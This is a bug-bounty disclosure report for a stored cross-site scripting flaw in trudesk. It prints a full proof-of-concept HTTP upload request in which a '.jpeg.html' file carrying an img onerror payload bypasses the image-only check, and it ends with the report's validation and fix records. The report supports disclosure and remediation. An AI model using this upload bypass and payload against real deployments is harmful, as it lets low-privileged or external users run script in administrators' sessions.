Cross-site Scripting (XSS) - Stored in polonel/trudesk

Valid
Reported on Jun 14th 2021

💥 BUG

Stored XSS via file upload, exploitable against an admin.

💥 SUMMARY

trudesk only allows image files to be uploaded, but this restriction can be bypassed and an attacker can upload an HTML file. Since an HTML file can serve arbitrary JavaScript, the attacker can execute any JavaScript code in the victim's trudesk account.

💥 IMPACT

A lower-privileged user can mount an XSS attack against an admin. Using this XSS bug the attacker can execute arbitrary JavaScript in the victim's account. Thus a lower-privileged user can execute arbitrary JavaScript in the admin's account via this XSS and change their role. Any external user can also carry out this XSS attack.

💥 STEPS TO REPRODUCE

1. First, as admin, go to http://localhost:8118/settings/tickets and grab your ticketing URL, http://localhost:8118/newissue .

2. Now, as an external user, go to http://localhost:8118/newissue , create a new ticket and upload a file to it.
During the upload, capture the request in Burp Suite or another proxy tool, modify it and send it (my modified request is shown below):

POST /tickets/uploadmdeimage HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
ticketid: 60c632a56e8507002262a20a
Content-Type: multipart/form-data; boundary=---------------------------180995348964997762475964139
Content-Length: 303
Origin: http://localhost:8118
Connection: close
Referer: http://localhost:8118/tickets/1004
Cookie: PHPSESSID=n3ofevpn16pm9p45ngraltrbtk; SMFCookie600=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%220bf82305176bf11c423867c0f41a1f7944174f1e%22%3Bi%3A2%3Bi%3A1812778653%3Bi%3A3%3Bi%3A2%3B%7D; ElkArteCookie700=%5B1%2C%22b34b4193d3296f9b57616347174aaf58503bf2226225496e5a159745bea75aba%22%2C1812793345%2C2%5D; _csrf=X6SB4CbNToC6T0TuClv-MPqa; express.sid=s%3A5tJvaz7mQH_plOxJ0Qm39QiZ0gZ6hpQ2.J5ipJrnNm3tGCLsqbRWuvnbIJBLL9XC3vHMTg4DEHCo; $trudesk%3Atimezone=America/New_York; connect.sid=s%3APvO_kBBiQoJLhJ-OvfW6Zgv0zwLxrTD0.owzip3EbVPWPph8Ac2o7Al34KE5gNPk08e0eyd%2B%2Bze4; io=OZOl201f1Xf9jNMuAAAN; $trudesk%3Asidebar%3Aexpanded=false

-----------------------------180995348964997762475964139
Content-Disposition: form-data; name="file"; filename="image-1623649594549.jpeg.html"
Content-Type: image/jpeg

<?php echo "hi";?>
xss"'><img src=x onerror=alert(document.domain)>
-----------------------------180995348964997762475964139--

After the upload, the link to the uploaded file will be of the form http://localhost:8118/uploads/tickets/60c632a56e8507002262a20a/inline_abc7eb397f33100f8e62.html . Open this link and observe that the XSS executes. Any user or admin who opens this link triggers the XSS.


STUDY

https://owasp.org/www-community/attacks/xss/
https://en.wikipedia.org/wiki/Cross-site_scripting
https://www.acunetix.com/websitesecurity/cross-site-scripting/
https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/

ranjit-git modified their report a month ago
Chris Brame validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty: $25
The fix bounty is now up for grabs: $6.25
Chris Brame confirmed that a fix has been merged on caaec1 a month ago
Chris Brame has been awarded the fix bounty: $6.25